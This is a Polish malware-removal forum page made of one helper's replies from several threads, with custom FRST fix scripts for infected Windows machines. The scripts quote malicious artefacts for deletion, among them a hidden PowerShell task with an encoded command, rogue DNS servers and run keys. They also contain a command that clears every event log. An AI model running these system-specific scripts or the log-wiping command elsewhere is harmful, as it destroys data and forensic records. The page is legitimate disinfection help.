Miszel03

Świetnie, więc teraz poproszę o nowy zestaw raportów FRST (koniecznie za pomocą nowej wersji!) w celu wykonania ostatecznych poprawek.

Odinstaluj programy ph i bl, przecież jasno jest napisane...

Akcja pomyślnie wykonana.

W raportach widoczne drobne adware (w przeglądarce Mozilla FireFox i w pliku Hosts, który czyszczę), wykonaj doczyszczenia, a następnie diagnostykę dot. niepokojących alertów. System jest oryginalny? Wszystkie usługi zgłaszają brak podpisu cyfrowego. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: GroupPolicy: Ograniczenia ? ContextMenuHandlers5: [Gadgets] -> {6B9228DA-9C15-419e-856C-19E768A13BDC} => -> Brak pliku Task: {C4CBA2C4-B103-46D1-B6CB-1B1AD0A9EFAB} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Dostarcz go. 2. Wyczyść przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. 3. Widoczne są niepokojące alarmy: mpsdrv => Usługa "Zapora systemu Windows" nie jest uruchomiona. MpsSvc => Usługa "Zapora systemu Windows" nie jest uruchomiona. bfe => Usługa "Zapora systemu Windows" nie jest uruchomiona. Niepowodzenie przy listowaniu punktów przywracania Sprawdź usługę "winmgmt" lub napraw WMI. Poproszę o raport z Farbar Service Scanner (FSS). Niepowodzenie przy uruchamianiu usługi "eventlog", nie można odczytać zdarzeń. Wyst?pi? b??d systemu 123. Nazwa pliku, nazwa katalogu lub sk?adnia etykiety woluminu jest niepoprawna. Start > w polu szukania wklep services.msc > powiedz czy widzisz na liście usługę Dziennik zdarzeń systemu Windows, a jeśli tak to z dwukliku pobierz Właściwości i podaj jaki jest stan: Automatyczny czy Wyłączony, a następnie Zatrzymano czy Uruchomiono? Jeśli to pierwsze, to jaki błąd zwraca próba uruchomienia usługi?

Tragedia, on mi jest teraz bardzo potrzebny. P.S: Wcześniej zapomniałem zapytać: dlaczego nie wykonałeś pkt. 1? Wykonaj jeszcze raz pkt. 2, ale z poniższą zawartością: CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Lewandosie\AppData\Local CMD: dir /a C:\Users\Lewandosie\AppData\LocalLow CMD: dir /a C:\Users\Lewandosie\AppData\Roaming VirusTotal: C:\Windows\root\WinUpdate.exe ...a następnie koniecznie dostarcz plik Fixlog.

Raporty nie wykazują oznak infekcji, w spoilerze zadaje działania poboczne - czyszczenie pustych wpisów / martwych skrótów, resztek po wcześniej odinstalowanym oprogramowaniu. Temat przenoszę do działu Windows 7, gdzie ewentualnie będzie prowadzona dalsza pomoc.

Infekcja adware rzeczywiście jest widoczna, ale przypuszczenie uszkodzenia dysku ma pierwszeństwo, więc temat przenoszę do działu Hardware.

Rozumiem, że Malwarebytes nic nie wykrył? Gdzie plik Fixlog?

Posty łącze, raporty przeanalizuje dziś, albo jutro rano.

W porządku. Wszystkie detekcje Malwarebytes daj do kasacji, a następnie zrób nowy zestaw raportów FRST.

A gdzie log nowy Addition? P.S: Żarty sobie robisz? Te pierwsze raporty, pod które pisałem skrypt były nieaktualne - musiałeś użyć jakiegoś oprogramowania wcześniej. Teraz powiedz co to było.

Kolosalny bałagan. Modyfikacja adresów DNS na zagraniczne, więc raczej są infekcyjne (KLIK / KLIK), infekcje bezplikowe wykonywane przez PowerShell. Niekorzystne / szkodliwe koparki BitCoin. Multum obiektów adware. Jednym słowem jest tu co robić. Od razu przechodzimy do działań: 1. Start > Panel Sterowania > System i zabezpieczenia > System > Z bocznego panelu wybierz Ochrona systemu > Sekcja Ustawienia ochrony > Wybierz dysk C > Kliknij Konfiguruj > Sekcja Przywróć Ustawienia > Zmień z Wyłącz ochronę systemu na Przywróć ustawienia systemu oraz poprzednie wersje plików > kliknij Zastosuj, a następnie OK. Ta akcja umożliwi mi stworzenie punktu przywracania na wypadek wystąpienia awarii. 2. Przez Panel Sterowania odinstaluj adware / PUP: One System Care, YoutubeAdBlock. 3. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKLM\...\Run: [sERVICE] => [X] HKLM-x32\...\Run: [] => [X] HKLM\...\Run: [gplyra] => C:\Users\rober\AppData\Roaming\gplyra\gplyra\start.cmd [216 2017-01-10] () HKLM\...\RunOnce: [jszk04y42kt] => C:\Program Files (x86)\Multitimer\29624.exe [1218048 2018-01-06] () C:\Program Files (x86)\Multitimer C:\Users\rober\AppData\Roaming\gplyra HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia IFEO\SppExtComObj.exe: [Debugger] C:\WINDOWS\SECOH-QAD.exe C:\WINDOWS\SECOH-QAD.exe GroupPolicy: Ograniczenia - Chrome HKU\S-1-5-21-2179461822-2610717262-2476200935-1001\...\Run: [458523] => C:\Users\rober\AppData\Roaming\jbps4iyyfzr\dwocjul3tz2.exe [694074 2018-01-06] (DHjkdg ) HKU\S-1-5-21-2179461822-2610717262-2476200935-1001\...\Run: [7709177] => C:\Users\rober\AppData\Roaming\hpudlgkqwqd\zteijymg3ig.exe [694074 2018-01-06] (DHjkdg ) HKU\S-1-5-21-2179461822-2610717262-2476200935-1001\...\Run: [8280762] => C:\Users\rober\AppData\Roaming\mwfpyc40tib\cpu3tqdwm5e.exe [694074 2018-01-06] (DHjkdg ) HKU\S-1-5-21-2179461822-2610717262-2476200935-1001\...\Run: [236801] => C:\Users\rober\AppData\Roaming\zwhtfln5ddp\ryuof3jbn2l.exe [694074 2018-01-06] (DHjkdg ) HKU\S-1-5-21-2179461822-2610717262-2476200935-1001\...\Run: [6075359] => C:\Users\rober\AppData\Roaming\tfjld32vk15\qrnoiytfyyy.exe [694074 2018-01-06] (DHjkdg ) HKU\S-1-5-21-2179461822-2610717262-2476200935-1001\...\Run: [2007778] => C:\Users\rober\AppData\Roaming\jbmxjhlkiax\nfdvmc2pkhg.exe [694074 2018-01-06] (DHjkdg ) HKU\S-1-5-21-2179461822-2610717262-2476200935-1001\...\Run: [4068841] => C:\Users\rober\AppData\Roaming\om4inqqk0dk\y01inoxm2vs.exe [694074 2018-01-06] (DHjkdg ) HKU\S-1-5-21-2179461822-2610717262-2476200935-1001\...\Run: [1505690] => C:\Users\rober\AppData\Roaming\sin23ee1iy5\dted345boon.exe [694074 2018-01-06] (DHjkdg ) HKU\S-1-5-21-2179461822-2610717262-2476200935-1001\...\Run: [3148841] => C:\Users\rober\AppData\Roaming\p31gvnwjdni\fjepflo1zln.exe [694074 2018-01-06] (DHjkdg ) HKU\S-1-5-21-2179461822-2610717262-2476200935-1001\...\Run: [6051548] => C:\Users\rober\AppData\Roaming\dume00dobkr\iivlipm32ju.exe [694074 2018-01-06] (DHjkdg ) HKU\S-1-5-21-2179461822-2610717262-2476200935-1001\...\Run: [3204014] => C:\Users\rober\AppData\Roaming\zn44ekngj1w\4c3r1t1sksq.exe [694074 2018-01-06] (DHjkdg ) HKU\S-1-5-21-2179461822-2610717262-2476200935-1001\...\Run: [1UXBF7VRUCQ1LN7] => C:\Program Files\312GR4SIS4\312GR4SIS.exe [669184 2018-01-06] (BUMVPN) HKU\S-1-5-21-2179461822-2610717262-2476200935-1001\...\Run: [i7ZZTNRZNZI26IZ] => C:\Program Files\OZU7LPSW8F\OZU7LPSW8.exe [669184 2018-01-06] (BUMVPN) HKU\S-1-5-21-2179461822-2610717262-2476200935-1001\...\Run: [66213ASU3ATFJEX] => C:\Program Files\AX3I2LNG6X\AX3I2LNG6.exe [669184 2018-01-06] (BUMVPN) HKU\S-1-5-21-2179461822-2610717262-2476200935-1001\...\Run: [3AXLA75QWGRR96B] => "C:\Program Files\1FG91MQVUM\1FG91MQVU.exe" C:\Users\rober\AppData\Roaming\jbps4iyyfzr C:\Users\rober\AppData\Roaming\hpudlgkqwqd C:\Users\rober\AppData\Roaming\mwfpyc40tib C:\Users\rober\AppData\Roaming\zwhtfln5ddp C:\Users\rober\AppData\Roaming\tfjld32vk15 C:\Users\rober\AppData\Roaming\jbmxjhlkiax C:\Users\rober\AppData\Roaming\om4inqqk0dk C:\Users\rober\AppData\Roaming\sin23ee1iy5 C:\Users\rober\AppData\Roaming\p31gvnwjdni C:\Users\rober\AppData\Roaming\dume00dobkr C:\Users\rober\AppData\Roaming\zn44ekngj1w C:\Program Files\312GR4SIS4 C:\Program Files\1FG91MQVUM Tcpip\..\Interfaces\{19bc2252-97f2-4732-a968-d5b2e8a913c2}: [NameServer] 82.163.142.8,95.211.158.136 HKU\S-1-5-21-2179461822-2610717262-2476200935-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ9Df0lc7ye1CLKAkM4jo69SCA5O5FkOioXeTPZGYEXqqTHtmJ9INgOeUSDyFgczmTxe_A-YfRrlKHiF_LNxop81s7dYYdqQ4bJAbNa-kSvlT6dpAf9cwFviuEJ07FnJFrNXJTHHht-HxnCBvsCFnO91K0Czw,, S2 service_box.exe; "C:\Program Files (x86)\System Native\Main Services\service_box.exe" [X] S3 updater; "C:\Program Files (x86)\System Native\Main Services\updater.exe" /runservice [X] S1 oahnmwqz; \??\C:\WINDOWS\system32\drivers\oahnmwqz.sys [X] 2018-01-06 12:44 - 2018-01-06 12:44 - 000003328 _____ C:\WINDOWS\System32\Tasks\LaCieS 2018-01-06 12:59 - 2018-01-06 12:59 - 000000000 ____D C:\Users\rober\AppData\Local\AdService 2018-01-06 12:44 - 2018-01-06 12:44 - 000000000 ____D C:\Users\rober\AppData\Local\Optimizer 2018-01-06 12:44 - 2018-01-06 12:44 - 000000000 ____D C:\Program Files (x86)\foldershare 2018-01-06 12:44 - 2018-01-06 12:44 - 000000000 ____D C:\Windat 2018-01-06 12:44 - 2018-01-06 12:44 - 000000000 ____D C:\Disk 2018-01-06 12:41 - 2018-01-06 12:42 - 000000000 ____D C:\Applications 2018-01-06 12:44 - 2018-01-06 12:44 - 000000000 ____D C:\Users\rober\AppData\Roaming\9aa9c57174cc460db233b7d85fa67383 2018-01-06 12:59 - 2018-01-06 12:59 - 000011568 _____ () C:\Users\rober\AppData\Local\InstallationConfiguration.xml 2018-01-06 12:42 - 2018-01-06 12:42 - 000140800 _____ () C:\Users\rober\AppData\Local\installer.dat 2018-01-06 12:59 - 2018-01-06 12:59 - 000930816 _____ () C:\Users\rober\AppData\Local\po.db Task: {DD2EBD9D-55DB-46CE-8C82-6B5854F5ADFF} - System32\Tasks\{79087A47-040C-787D-0911-0E7A05041104} => C:\WINDOWS\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAOwA7ADsAIAAgADsAIAAgADsAIAA7ACAAOwA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUA (dane wartości zawierają 9984 znaków więcej). Task: {3A27DC34-828A-4D19-95DC-1EE5109F0B60} - System32\Tasks\BcyoMZkjXMgFaPP2 => rundll32 "C:\Program Files (x86)\umkISPBbU\lcsJvU.dll",#1 Task: {3A778ED2-68C4-458A-9F6C-B4F5FA5CB781} - System32\Tasks\saKXaLnxQURzlMgex2 => rundll32 "C:\Program Files (x86)\RrHYXuUpocPTIXdsppR\bkEGUze.dll",#1 Task: {55F70757-A2F9-4C40-AD5B-52BCEC7C362A} - System32\Tasks\pnIxobGIUDXdNt => rundll32 "C:\Program Files (x86)\TwPufLOWyrxU2\blGcZsqJfvdUO.dll",#1 Task: {6C7D5F18-F1BD-4A83-83D4-01158636FC38} - System32\Tasks\plaAVjRQXWCDePSecyr2 => rundll32 "C:\Program Files (x86)\aohGTEheqdnWC\MduDQxt.dll",#1 Task: {95A34E05-D4FB-438F-B073-63E5E40280CD} - System32\Tasks\plaAVjRQXWCDePSecyr => rundll32 "C:\Program Files (x86)\aohGTEheqdnWC\MduDQxt.dll",#1 Task: {9F90BEA2-B617-4140-AE3A-7554A1AB323D} - System32\Tasks\BcyoMZkjXMgFaPP => rundll32 "C:\Program Files (x86)\umkISPBbU\lcsJvU.dll",#1 Task: {C7F6B99E-AA8E-4071-A0B0-FCF13F3F872D} - System32\Tasks\saKXaLnxQURzlMgex => rundll32 "C:\Program Files (x86)\RrHYXuUpocPTIXdsppR\bkEGUze.dll",#1 Task: C:\WINDOWS\Tasks\BcyoMZkjXMgFaPP.job => C:\Program Files (x86)\umkISPBbU\lcsJvU.dll Task: C:\WINDOWS\Tasks\plaAVjRQXWCDePSecyr.job => C:\Program Files (x86)\aohGTEheqdnWC\MduDQxt.dll Task: C:\WINDOWS\Tasks\saKXaLnxQURzlMgex.job => C:\Program Files (x86)\RrHYXuUpocPTIXdsppR\bkEGUze.dll Task: {A32CD1B1-6267-43DC-837B-9E18DEAB3613} - System32\Tasks\Areary Page Fix => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\Areary Page Fix\Areary Page Fix.dll",SsWffym C:\Program Files\Areary Page Fix C:\Program Files (x86)\umkISPBbU C:\Program Files (x86)\RrHYXuUpocPTIXdsppR C:\Program Files (x86)\TwPufLOWyrxU2 C:\Program Files (x86)\aohGTEheqdnWC Task: {A32CD1B1-6267-43DC-837B-9E18DEAB3613} - System32\Tasks\Areary Page Fix => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\Areary Page Fix\Areary Page Fix.dll",SsWffym C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Asystent uaktualnienia do systemu Windows 10.lnk C:\Users\rober\Desktop\Google Chrome.lnk C:\Users\rober\AppData\Roaming\Microsoft\Windows\Start Menu\Music Challenge.lnk C:\Users\rober\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\rober\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gоogle Сhromе.lnk C:\Users\rober\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Gооgle Сhrоmе.lnk C:\Users\rober\AppData\Roaming\Browsers C:\Program Files (x86)\Google\Chrome C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\rober\AppData\Local\Google\Chrome DeleteKey: HKCU\Software\Google\Chrome DeleteKey: HKCU\Software\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D} DeleteKey: HKCU\Software\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96} DeleteKey: HKLM\SOFTWARE\Google\Chrome DeleteKey: HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D} DeleteKey: HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Chrome DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96} CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\rober\AppData\Local CMD: dir /a C:\Users\rober\AppData\LocalLow CMD: dir /a C:\Users\rober\AppData\Roaming CMD: netsh advfirewall reset CMD: ipconfig /flushdns Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Wyczyść przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. 5. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

W raportach brak oznak infekcji, więc poszerzymy diagnostykę. 1. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 2. Wykonaj diagnostykę dysku za pomocą CrystalDiskInfo i dostarcz wynikowy log. 3. Pobierz OCCT, jeśli konieczne rozpakuj go (np. za pomocą WinRAR), a następnie uruchom. Wykonaj test (guzik ON) na domyślnych ustawieniach przez okres 20 minut (zakonczenie testu - guzik OFF), po nim zakończy się proces diagnostyczny i zostanie otworzona lokalizacja raportów. Wszystkie skopiuj, spakuj, a następnie wstaw na hosting plików (np. na MediaFire). Link do pobrania raportów umieść w poście i czekaj na dalsze instrukcję.

W Harmonogramie zadań nadal są obecne infekcje. Resztki po innych instalacjach adware wskazują na to, że musiałby tu wcześniej niezły bałagan. 1. Za pomocą narzędzia Program Install and Uninstall Troubleshooter odinstaluj podejrzane instalacje bez podpisu wydawcy: ph, bl. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: Task: {4A01D667-4F1F-4E2A-84E5-B673CFDF6F3D} - \{7A7D7947-0C0F-0E04-0C11-7D050B0A117E} -> Brak pliku Task: C:\Windows\Tasks\RB.job => C:\Users\Lewandosie\AppData\Roaming\RB.exe Task: C:\Windows\Tasks\RHOWNXEN.job => C:\Users\Lewandosie\AppData\Roaming\RHOWNXEN.exe C:\Users\Lewandosie\AppData\Roaming\RB C:\Users\Lewandosie\AppData\Roaming\RHOWNXEN HKU\S-1-5-21-1873305243-1807652570-931623353-1000\...\Run: [AdobeBridge] => [X] ShellIconOverlayIdentifiers: [.QMDeskTopGCIcon] -> {B7667919-3765-4815-A66D-98A09BE662D6} => Brak pliku ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => Brak pliku GroupPolicy: Ograniczenia - Chrome CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia SearchScopes: HKLM-x32 -> DefaultScope - brak wartości S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys [X] S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\Uninstall.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows 7 - Codec Pack\Uninstall.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows 7 - Codec Pack\Helpful Resources\How to play unusual files.lnk C:\Users\Lewandosie\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\HxD.lnk C:\Users\Lewandosie\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Program Files (x86)\IHeeaWA C:\Program Files (x86)\WinZipper DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Lewandosie\AppData\Local\Mozilla C:\Users\Lewandosie\AppData\Roaming\Mozilla C:\Users\Lewandosie\AppData\Roaming\Profiles CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Lewandosie\AppData\Local CMD: dir /a C:\Users\Lewandosie\AppData\LocalLow CMD: dir /a C:\Users\Lewandosie\AppData\Roaming VirusTotal: C:\Windows\root\WinUpdate.exe Hosts: Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj jeden z blokerów reklam (masz dwa, a w ogóle to sugeruję wymienić je na uBlock Origin) oraz wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. 4. Ponów skan Malwarebytes, jeśli coś wykryje ponownie to nic nie usuwaj, a dostarcz raport. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Raporty nie wykazują oznak infekcji, w spoilerze zadaje działania poboczne, czystko kosmetyczne. Temat przenoszę do działu Windows 7, gdzie będzie prowadzona dalsza pomoc.

OK, to zamykam. Na koniec zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows.

Te są problemy poza infekcyjne. Zbędne pliki / uszkodzone elementy rejestru to raczej resztki po różnych programach.

OK, w takim razie zamykam. Na koniec zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows.

Osoba, która zna system czyta raporty typu FRST z zamkniętymi oczami, a Tutorial jest, aż nadto, czyli widać, że nie znasz na tyle systemu by móc korzystać z tego narzędzia samodzielnie. Ta dyrektywa omija kwarantanne, więc nie będzie później jak w razie czego tego przywrócić. Załącz po prostu C:\Documents and Settings\NetworkService\Cookies. P.S: Ten folder nie nadaję się do usunięcia, ewentualnie jego zawartość, czyli najlepiej to zrobić przez \*.*. Wróć do Tutoriala. Ta dyrektywa skasuje cały folder wraz z jego zawartością. Załącz w skrypcie: C:\y\IP multicast.pdf, plik zostanie przeniesiony do kwarantanny FRST. W Tutorialu jest sekcja poświęcona wykonywaniu skryptów - wszystko jest tam zawarte. Tak, np. jeśli Hosts nie chcę się skasować i utworzyć od nowa wówczas FRST restartuje system (lub dyrektywa w nim zawarta), a następnie informuję w Fixlog, że "zaplanowano do usunięcia po restarcie" i jaki jest wynik tej akcji. To już pytania całkiem po za użytkowaniem FRST, tu trzeba po prostu znać sam system. Znowu: trzeba znać system, tak, aby stwierdzić jakie kroki trzeba zastosować w celu zdjęcia ograniczeń, a następnie skasowania. FRST to tylko narzędzie pomocnicze, podstawa to znajomość systemu.

Zbliżamy się do finalizacji. 1. Zagrożenia wykryte przez Malwarebytes daj do kasacji. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: DeleteValue: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.accdb\OpenWithList|Firefox.exe DeleteValue: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docx\OpenWithList|Firefox.exe DeleteValue: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithList|Firefox.exe DeleteValue: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sql\OpenWithList|Firefox.exe DeleteKey: HKLM\SOFTWARE\Google\Chrome\Extensions C:\USERS\HUBERT\APPDATA\ROAMING\ELEX-TECH EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Przedstaw plik Fixlog, napisz jak oceniasz obecny stan systemu.

W raportach brak oznak infekcji, jak sam napisałeś - to raczej nie może być problem przez nią powodowany, bo system jest nowy. AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556} AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB} FW: McAfee Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D} McAfee LiveSafe (HKLM-x32\...\MSC) (Version: 15.0.179 - McAfee, Inc.) Powyżej zaprezentowałem wycinki z raportu Addition - jest jawnie zaznaczone, że w systemie jest już aktywny program zabezpieczający - McAfee LiveSafe. Przypuszczalnie to właśnie tutaj jest problem, a dokładniej: inne programy zabezpieczające wykrywają obecność zainstalowanego już programu i same nie instalują się w celu uniknięcia konfliktów (dwa programy zabezpieczające dublują się w swoich działaniach powodując rozmaite problemy). Reasumując, po deinstalacji McAfee LiveSafe za pomocą dedykowanego deinstalatora (link do serwisu BC, bo strona pomocy McAfee jest z tego co widzę aktualnie niedostępna) nie powinno być problem z instalacją inne antywirusa, jeśli jednak będzie proszę zgłosić się o pomoc na forum ponownie. P.S: Widzę, że są jakieś elementy AVG w systemie, więc przed ponowną instalacją również użyj dedykowanego deinstalatora.

Zostały usunięte praktycznie wszystkie aktywne infekcje, a gdy usuniemy po nich resztki będzie jeszcze lepiej. Niestety, ale przeglądarka Google Chrome została zmodyfikowana przez adware za pomocą preferencji - takie modyfikacje trudno usunąć tak, aby nie wytworzyć dodatkowych problemów (ja np. nie zgadzam się całkowicie z podejściem zamiany plików - żeby był porządek najlepiej jest przeprowadzić reinstalacje - w ten sposób uniknie się skutków ubocznych). Po za tym jest dużo lepiej, ale jeszcze nie osiadamy na laurach. Trzeba zrobić spore poprawki, by całkowicie usunąć resztki po infekcjach. Wyniki z Malwarebytes póki co pomijam (w skrypcie będę teraz poprawki doczyszczające do moich wcześniejszych działań), bo są tam elementy preferencji, o których wyżej pisałem. Przeprowadzisz skan jeszcze raz w pkt. 3. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: DeleteKey: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\29069fe7_0 DeleteKey: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\e4b123f0_0 DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\DiagnosedApplications\Firefox.exe DeleteKey: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\92763c4c_0 DeleteKey: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\9eac0a35_0 DeleteVaule: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.accdb\OpenWithList|Firefox.exe DeleteVaule: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docx\OpenWithList|Firefox.exe DeleteVaule: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithList|Firefox.exe DeleteVaule: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sql\OpenWithList|Firefox.exe DeleteKey: 